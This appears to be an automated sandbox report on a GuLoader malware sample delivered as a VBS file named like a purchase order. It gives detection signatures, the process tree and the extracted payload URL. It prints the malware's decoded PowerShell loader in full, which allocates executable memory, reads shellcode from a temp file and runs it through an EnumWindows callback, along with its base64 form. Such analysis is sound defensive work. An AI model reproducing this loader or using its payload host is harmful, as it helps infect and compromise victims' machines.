Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-19903.vbs

Overview

General Information

Sample Name:PO-19903.vbs
Analysis ID:625175
MD5:0347b27843d88f73fdcd4dadb95549ac
SHA1:2a2d6bcd2d83833d501b9695921855e1992f6ec8
SHA256:1ab3aacaa62faa6a83173e9191972d427aab92f33c527f6964f141e21c930e67
Tags:GuLoadervbs
Infos:

Detection

GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
C2 URLs / IPs found in malware configuration
Potential malicious VBS script found (has network functionality)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

  • System is w10x64
  • wscript.exe (PID: 6420 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 2404 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# D i s d a i   D i s h u m a 5   S o r t   T A F F E   C r a m p o o n d   G R U N T I N G B   P r e a m b u l a t 3   A s s i m i l 6   F u r s e m i d e b   F u r i e n s d e c   A l a r m u r e 2   C h o r i b   H U M O   F I S T E L S T E M   S t e g e   c h e s s e   b a r r y m o r   A n n g r e t h e 3    
 # R e m i n g l i 4   e r n r   B e s p y t   S u l p h o z i n 8   V I R G U L A   I F R D   F o r e   P l u r a l v e k s 1   P r o f i l e n u   n o n f o   I n j u s t 9   N o u r i s h m e n 3   t o m a h a v k e n   E s s a y 1   B L A A   t r a n s m o g   h u l k   i n l a y e    
 # k v a r   K o b a n g f o r 6   H y p e r a r c 6   G A R D E R O B E N   O n c o s p h e r e   B u n g l i n   B A R Y T   T O M A S T E   C O R R O B O R A T   C Y K E L P A R   S t a d s l g 3   B a c i l l e b   B L U R T I N   a d m i n i s t r   M i l i e u b 3   B l a d e l e 8   a p o m e t a b    
 # P e a l 8   K i n g 9   O p m r k e r c o   I D E L I G E S I   S y s t e m a t 7   P r e o p e r 3   R e s o   S P A G N U M   L a n d   r e c k o n i   d e p r a v e r   f a r t j s f o r t   L A N N   G r i f f o n a g 3   A F S E   h j s d   a n a l y s e a r b   A M U L A S    
 # u n j o l l y   I n s t r u m e n   G L A L I I N G L   R e s o a p   W o m a n i   L e g g i e r 5   U N B R E A K I N G   O r i l l i o   a d r e a   A L T O L A T   F a g o 2   I n f l a m m a t 6   C O C K N E Y D O M   S Y M P O S I   g r a v e r e u   F O R U D   F A S T R E S F I   K o n t r o l   S K R L E V   A N A L Y T I K E R   U N C R   S o r t s r   v i d n e f r s   E O C A R B O   T a k t   B e t v i v l e r 3   V e l a r    
 # R e v a n c h e r   W o r d a b l e s   l o u s i e r m a   i n d l o g r b r n   A t t a   R E B L O W N G U   Q U E B R I T H C   G R N S E O V E R G   f r y t l e r n e s   L E M P E L I G E S    
 # a n d e l s s   C a m b a l l m 4   S o r t e r i n g   L n g s t l e v e n   o u t b o x e   S I G N I F I C A T   M a n a   D U N K A R D   U n s c o r   t r o n b   h y p o h e m i a g   M A T T E S T E   e n g r o s   F e r i 2   U N C O N V E   M i n d s t e h j   N i t r o g e n   c h e v   K o r p 6   s t t e d   m i s k r e d   u m e n n e s k e   G a l o p l o   U d s k r i v 2   M A G N E T O M E T   T R I L L I O N T H   H A A R B R S T E   I m m a t c 6   d r u e h   S s l a   C o u n t r y r o 2   N o n e x    
 # A l i s p h e n   s u l a   i d m m e l   T r i b r a c 2   T i l e g n e l   U n d e   d k s d   t u j a s u r   C i r c 8   B r o o   A p p e 1   O k s e h u d e   n e t s t r o e m   T e k n o l o g 2   k l o r e   B A L L A D R   U N F L U T T E R E   b o y k o   T i l b r i n g e   p h y s i   F E L W O   G e n e r i s k t v 5   S u k k e   L o d g e a r t 3    
 # U n e v a d a   E n c e p h 2   p o l e r e m i   z a k a r i a s s   s c o l l   B o a t l 7   S a m a r   H u t c h i   a c e t a n i o n   I N T E   S t u b b   a l d e   L a m b k   N o n r e t r a   S k a n d a l e h   p r e c e l e b r a   P r o t o p r e s 5   l i v s f o r s i   U P B R I M A M B   S H I V E   U n c a 3   k r e a t i   H o v e d a f s   W u g g l i k    
 # U N D G A A R T A   K n u d 7   t r a p p e t r i n   f i r e m a s t e r   U N I N T O X I   A r c h e   R E D U   m y x o n   M u t u a l 5   b l o k r   S t i l s k   A i g u i l l e s q 7   s p e w i e   P a s k o 8   H o v e d t r a p   S i o u   C r e a t u   M u g g   A R T W O R K S K O   R A A D Y R E N E   P o o r l 9   A d v o k a t f o r   A b o r t 2   m o r s e l i z e n    
 # o m m a t i d i   M U L L I G A N S U   B e n e n d 7   s p r j t e g i   C e m e n 7   G e n e r a t o r e   S N A P S E F   B O T A N   i n f a   F a a m l t m e t 3   f i s k e r k   B j r g e r n e p   S a b e 2   A k t i o   E r f u 7   F u s i o n e r i 2   L U D O S T A N D   B A T H O R S E C   r e v o   s a n s e o r   A f s t i g 9   S T R A F F   E r k l r i n g s m   A r b e j d   S p e c t 7   P r o g r a m 4   J O U N C I   P r e o u t l   a s t r o f y s i   S T E N Z E B R N   A p p o   f i l m o   K o m m a e r s    
 # A b d u l s u f 2   C i v i l 7   C a r a c a   H e m i h y d r o   p o d o d y n i a   g a l a   H E L O D E R M W   A u d i t i v   H O M E W O R T F R   u p s r i   f l e u r e t t e r   r e m a t   u n e x c e r p t   S p i l l e r e l 4   I N D K   G r a d d a g s h   o c u l a   B a n t a m v g t   U n d e   U o p s k a a r 7   L y s p u n k t e 5   k o m m a n d o l   T i l b a 2    
 # R e v n e r n e p r   c o l u m b   S y n d   U N G L O B U L A   O p d e   H e i k o s a m a   B a a n d 5   c o s t o c l a   f a m i   H e r s c h 6   T R U T M U N D   A n l i s m 9   O L I B A N U M   N O M I N A L N   I l d f u g l s   d i r e c t o   S h a p e   U p a s s e l i g   p a r a b u   W h i f f   D I G E D E S   S k a a n s e l s l 4   o p t r k k e   E r l a g t e 7   v i e l s e a f f   F r i l a n 2   S e d a n e   S y n e o m t v i s 9   u n c i a l r e   H v a l f a    
 # A v i s s p a 7   o f f b e a t s b   B r i g g e r n e s   S t a n d a r d u 4   U N S P E E D   A m e r i c a n i   C Y S T O L   U N P E N   Z e t a 9   u n c r u m p   E u r o p 8   F o r s v a r 8   T e n n i s f i 6   E t i s k 5   S i a m e s 5   g a l g e n f u   M o t h e r s o m 6   E r e m 1   K Y L L I N   A n d r e n i d   p i s o t e i n c l   M e t a s o m a s i   I r r a t i o   V A L L O N E R E N   S k u l d 8   B I U N I T Y K    
 # A d s b l o r c h i 5   Q u i n q u e   H E M I C E   u d k o m m e   s k a r l   U P P U F F N E G R   P I N E S A   A T H E R O   f o r y n g   u n c o n f i d   I d o n e i   O r t h o d o x i 2   s t y r e   a f d d e   S L U T T E D E    
 # D I A C O N I   K v a n t i t 5   u n d f l y e d e   P r a e s   T U P E K S O M N   d e m e n t   T m r e s   A n t e m a r g 5   A v o w e i n d 9   p r i b   H E L I N G    
 # S I D E O R D N   G a l v a n o p   S y f i l 8   c y d i p p i   S h a m a n   G u a n s   S l a p p e r 1   E n s u   S t u d y s f u   c e c i   A f t e n 7   s l a p p e l   T R I T O N E   M u s i c l i 5   H e r t u g d m m e   f o r m a n e n d   b r a i l l e s d i   H O M E L I   P L E A   p u r i f i c a t   F A L B Y D E L S E    
 # I N T R   G r a v l s v a r m   m u s i k h a   C h a i r m 4   F r i b o s s a 5   T i l s m u d 5   d y s f u n   k h a r o   V e r d   S U P E R   I n a p p e t   C O O L N E S S E S   B a g v   F l o r i f   A r c i f o   P t y a l 4   P a d s a   S k a a l 3   D U L L Y H J L P   S m i t s 2   F l y v e   T r o l d d o m s 9   u f o r u   u n v o   D R A G N   f a n t a s i l    
 # F r y g t e g o o d   M a g n e   S t y r e f j e r e   T i n f u   p i n f   n d t v u n   S e k s u a   T i l s t n i 7   V r d i p a 8   U n f a v o r 9   S t a l 6   t o p c o a t i n   G O D K   N a g s m a n   L U T I S T S U D E   B E L L A D   P a l t   O p s t   C I R C U   K l a m r e   a f g r f t e   F r e m k a l d e    
 # a n a l y s e m   F r y d e f u l 1   T u b e r   K u s i n e   D y k k e   E m p a t i s k k o   F r d i g g r 4   O r g a n i s 1   P a l m a t i   M E D D E L M A   M e n s u r a t i o 8   t a b e r s r   F I R M I N T E R A   A f l a d s k r m m   B a k l y g t e r n 9   P E A S A N T   t i l g   S t a r e d 6   B o r t s l g e n   S V E L T E S K E L   C i l i i u m p o l 1   B E V I D S T G R G   d d n i n g   G A M E S T R E S S   p l j n i n g   S p o n d i s k e 8   N i d o   k r a k i l e r n   A f s e r i l l 4    
 # U n d e r l e v e   A m y o s t h e 8   O r k n e y   s t u d s n i n g e   s e r a u b   D A N N E B R O G   S v r d l i   T r i o p s s k a t 2   R O T T E F L D E R   K v a r t   s h a w l l i k e m   d a a s   K A S T N I N G E   F e e d e 2   e m b e d s e k s   V e l g r e r   C o g i t a   P a h a   b r n d s   T R Y K M A   S y n l 9   C l i t o r o m 9   A n n u n 8   U N I R   U N W E   O p i n i   U d a d v e   i n d i a n   R U B N   A l i g h t   S t v l e t t e    
 # a l l o p a   S e s a   A n i m a l   I M M I G R A   S p r j t e n   N o o d l i n g   L a c q u e r 4   B B C M U T T E   a b u z   A l g e v k s   C h a r m e t r 1   T h e n c e f o r 2   T i n s e l r 1   S l v s n o r e   u n s a w   H U L W O   h j t s i d   a f s l    
 # R O S E O   F A B R I K E R   P E N T   S l a g   q u a v e r e d d e   t r e d o b l   c e n o g e n   U H J L P S   b e g r l i   P R O B L E M   T h e r a p s i d 4   T r n r m i c r o p   U n a r 7   P R E J U   H v i l e d a g e n   L y g t e p l w h i 5   L a v i s h e s 1   b o o k s e l l i n   s o e k o e s k v i   d o r t   R e n d e g r a v n    
 # N i v e a 5   c o n c l u s i b   S P E E R I N G   S u p e r o f f i c   G a n g l i n j e s 3   a s c h   R e s i d e n   S T J F I L T R E   u n i t t e   L E G E R E D E   s t e r   i d e e r   O p k l b b e n v n   S e r e a n   s l a v e    
 # t y r a n n i   b o g e n s   H A N D E L S F O R   E p i k e r   V E D R O E   P a r e   I n t r v a s   P e t r o g e n y 2   A s s e n d e n   S u g a r i n g   i c h t h y o s a u    
 # L a n d m a s s 4   R b a r e s p 6   P r e c e l e b r a   P a s i g a n g g 5   U n r e n u n c   B A G S T   S T J G R N   U n p r e f e r   T M R E   L o d t r k n i n g   C o n v 1   V A E R N E   h o l a   e x p e r i m e   T y k k e s p l a d 1   E U P L   P o s t p r o j e   P l o v f u r e s 8   A r b e j d 3   t o b a k   R a d i o 6   A S P I Q   C o n r a d h e k 1   S n a r i 9   I m i t a t i 8   K a g e m a d 7   A f g u d s    
 # U N P H   F r e r 8   R e d i   H o v e 4   D A T A B A S E S   T I L B A G   R o t t e r n e   s a n s e o r g a n   s q u i r t   O m o p l a t o s c   R s k n   K y l l 9   T O N E D S K I F   C o a c 7   s p o n g y s   K a t t e 7   H y d r o t h e r a 6   C O M P R E H E   S a x o   P A P I R T   b a r y e   r a t o n f o r e d    
 # u n d e   A M P H I P O D   S p r o g f o 6   b o n d   A L T S T   C h a n g o a n a n   P A U R O P   F o r m i n   L o v p r i s f r e 7   E x c o c t i 6   T A K T S   A n t i e m p i r i 7   G a r n e r i n g e   P L A N X T   K N I V M   v r d i r e d u   P o l y c h o r   e l i s o r s h   V i t e s s e 2   s e s s i   B o r t l e d t e   K A N D I S E N K   G i n s i 4   K U N S T M U S E   P a r e r i n   S Q U U S H O K U L   m a t r i c u l a t   D i m s s s m 4   S E S T I A N   R e h a b i l i t    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   F o r l y 9 1  
 {  
 [ D l l I m p o r t ( " g d i 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m F o n t s A ( s t r i n g   F A B L E , u i n t   K o n g e h u s , i n t   D i s v o i c e a o , i n t   F o r l y 9 0 , i n t   M a i n a s c h e , i n t   M o r a l i t 1 , i n t   T O R E A D O ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " C r e a t e F i l e A " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   V i a c ( [ M a r s h a l A s ( U n m a n a g e d T y p e . L P S t r ) ] s t r i n g   F A B L E , u i n t   K o n g e h u s , i n t   D i s v o i c e a o , i n t   F o r l y 9 0 , i n t   M a i n a s c h e , i n t   M o r a l i t 1 , i n t   T O R E A D O ) ;  
 [ D l l I m p o r t ( " n t d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   N t A l l o c a t e V i r t u a l M e m o r y ( i n t   F o r l y 9 6 , r e f   I n t 3 2   r u s t n i n g e r , i n t   P o i n t s m e n h , r e f   I n t 3 2   F o r l y 9 , i n t   W O R K S H I P M E , i n t   F o r l y 9 7 ) ;  
 [ D l l I m p o r t ( " K E R N E L 3 2 " ,   E n t r y P o i n t = " R e a d F i l e " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   C D A C ( i n t   P o i n t s m e n h 0 , u i n t   P o i n t s m e n h 1 , I n t P t r   P o i n t s m e n h 2 , r e f   I n t 3 2   P o i n t s m e n h 3 , i n t   P o i n t s m e n h 4 ) ;  
 [ D l l I m p o r t ( " U S E R 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m W i n d o w s ( I n t P t r   P o i n t s m e n h 5 , i n t   P o i n t s m e n h 6 ) ;  
  
 }  
 " @  
 # H O V E D B Y   V E L S E S M   E v e r e d   P r o a m a t e u   p a a s k y n d   H a a n d e v e n   f o r l b e r n   b e t h a n k i n g   e u r o v i s i o   F o r u d d i s    
 $ F o r l y 9 2 = " $ e n v : t e m p "   +   " \ O V E R . d a t "  
 # b o o k l i f t m   F o r s a e d e u   U n d e r s   b o r t f o r k   d e t e   L a m p a   B l a n c h e d 6   T a w p i e m a s t   t i l s t a n d   k a r t o n n   B e v i l g e n d 1   B a g g r u n d 1   T a n t a l i s e 2   B l o d t 3    
 $ F o r l y 9 3 = 0 ;  
 $ F o r l y 9 9 = 1 0 4 8 5 7 6 ;  
 $ F o r l y 9 8 = [ F o r l y 9 1 ] : : N t A l l o c a t e V i r t u a l M e m o r y ( - 1 , [ r e f ] $ F o r l y 9 3 , 0 , [ r e f ] $ F o r l y 9 9 , 1 2 2 8 8 , 6 4 )  
 # S v k l i n g e r n 1   b l a n k   G u t t e r s s e   U H Y G G E N S I L   U f o r d   R i g s g r e   B L O K N I   E V A N E S   T r a c t a b   J u l e n e g   b n f a l d e l s   M I S L   o m s t   T e s t i k l e n 6   F i l m   p a m p a n g o k o    
 $ F o r l y 9 4 = [ F o r l y 9 1 ] : : V i a c ( $ F o r l y 9 2 , 2 1 4 7 4 8 3 6 4 8 , 1 , 0 , 3 , 1 2 8 , 0 )  
 # L e n s a f t a l e   N a t u 8   F O R S A M L I N   I n k o   S U B M O D E A   e l e f   c a t a r i n e s   B r a n c h e o r   N o n f a n 5   M i s w 7   B i l l   z o e f o r   P a l a e   K h a r u n   r e t r i b u t i   S u f f r a g e t   L i n s e r n 7   E k s i l e r 9   c a t a l y s t l e   V a g i f   S k r l l e r a n i   R E T S A   T h r o c k s i   I n e f f i c a c 8   g e n e r a   U l v e u n g   N i g h t w a r d n 2   K V A D R A T T A    
 $ F o r l y 9 5 = 0 ;  
 # L a n d s r e t p o 4   O p s v u l 3   K o n t r a   p r e d e   B R A N D S L   S K O V D A H L U   d e c a n a l s a   k a o l i n s a   g r u t t e d e   S t r m f o r b   P s e u d 6   H e p t a r c 8   S e c r   b i l l o w i n   b a t c   F I T T A B L E   P i n k n e s s e   P S O C I D A E C H    
 [ F o r l y 9 1 ] : : C D A C ( $ F o r l y 9 4 , $ F o r l y 9 3 , 5 9 1 7 9 , [ r e f ] $ F o r l y 9 5 , 0 )  
 # t h e m   S P A T A L   S t a l l e r o 8   P i s t i   O e d i c n   C A N N I B A L   L y k k e d e s s 7   t r e d i v e a a r   R e j s t f 4   S U P P E T E R R   F l e r d o b 1   I n o r d i n 5   K N B E   S t a t i   R e s t a u r a t 8   L i t h y s 8   L E T T R O   l i g r o i n s r   D r b t   d e g a s s e s   B l r e r o 8    
 [ F o r l y 9 1 ] : : E n u m W i n d o w s ( $ F o r l y 9 3 ,   0 )  
  
  MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1164 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 4728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
{"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}
SourceRuleDescriptionAuthorStrings
00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000003.585259442.000001AB0D281000.00000004.00000020.00020000.00000000.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
    • 0x1eaa:$s12: Wscript.Shell
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}
    Source: PO-19903.vbsReversingLabs: Detection: 19%
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.pdb source: powershell.exe, 00000012.00000002.801305815.0000000004CD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.801562069.0000000004EB4000.00000004.00000800.00020000.00000000.sdmp

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://vegproworld.com/wp-content/Touchb.vbs
    Source: Initial file: Matri11.SaveToFile FileName, adSaveCreateOverWrite
    Source: powershell.exe, 00000012.00000002.799500951.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000012.00000002.801078678.0000000004BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4A